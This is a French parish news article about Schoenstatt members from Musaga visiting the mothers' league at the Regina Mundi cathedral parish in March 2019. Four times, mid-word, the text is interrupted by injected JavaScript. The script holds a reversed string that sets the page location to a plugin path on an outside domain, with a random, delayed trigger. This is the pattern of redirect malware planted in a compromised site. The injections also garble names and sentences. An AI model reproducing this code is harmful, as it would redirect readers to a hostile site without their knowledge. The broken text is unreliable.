Le Dimanche 24 mars 2019, une cinquantaine des schoenstattiens hommes et femmes, garçons et filles venant de la paroisse Sainte Anne de Musaga se sont rencontrés au lieu de rendez-vous, à la paroisse cathédrale Regina Mundi.

Ils ont participé dans une messe de 8heures avant de se rencontrer devant la salle de réunion pour une animation libre et faire résonner l’hymne du Mouvement. Ils se dirigent enfin  dans l’une des salles.

Après la prière et le partage de la parole de Dieu, le responsable du Mouvement à la Paroisse Musaga KAGISYE Dieutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné relate en peu de mots l’objectif de cette visite : « Nous sommes venus visiter et encourager la ligue des mères de Schoenstatt en apostolat ici. »Notre désir, ajoute-il, est qu’il y ait d’autres branches du Mouvement comme la branche masculine et féminine.

Il a encouragé ses mamans à aller en avant : « Avec vous, nous voulons continuer l’œuvre de notre Père Fondateur, en essayant de faire connaitre le mouvement partout dans le monde. »

Comme il l’a dit, c’est pour lui une occasion d’apaiser ces mères  en leurs rappelant que la Mère Trois fois Admirable va continuer son travail : « N’ayez pas peur ! Nous, nous accomplissons notre mission d’instrument et la mère de Dieu ne recule pas, elle va continuer son œuvre. »

Il a assuré que très prochainement la Vierge Sainte va se charger à faire flotter l’étendard du Mouvement dans cette paroisse. Lui-même le conférencier du jour a souvenu à tous les participants qu’ils sont comme David devant Goliath : « Comme David, nous devons rester courageux et audacieux, la peur ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas nous emporter. »

Selon lui, le monde d’aujourd’hui est comme le géant Goliath : « Devant ce monde fou, ce monde de guerre, de sang et de pleurs, nous sommes appelés à rester débout et annoncer sans crainte le message libérateur de Schoenstatt. »

Emmanuella HAKORIMANA, responsable de la ligue des mères à la paroisse cathédrale n’a fait que remercier vivement le chef du Mouvement à Musaga et ses compagnons. Elle salue l’initiative. Par un petit témoignage, elle a confirmé à tout le monde présent que c’est vrai que le serviteur de Marie ne périra jamais

Les participants se sont convenus de faire chacun une prière jusqu’à la même date de l’an prochain en invoquant Marie l’Etoile, pour qu’elle puisse venir s’installer dans ce lieu. Ils disent qu’ils n’ont aucun toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute au résultat positif. Ils ont promis de fournir aussi un effort significatif comme par exemple venir chaque fois le jour de réunion à la Paroisse cathédrale pour soutenir en partageant la vie et les instructions avec ces nouveaux membres.

Signalons que les schoenstattiens des Paroisses Kinintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do, Nyakabiga, Saint Michel et un de la Paroisse Mpimba se sont joints à ceux de Musaga qui en sont les organisateurs.

 

 

Egide SIMBARE

Laisser un commentaire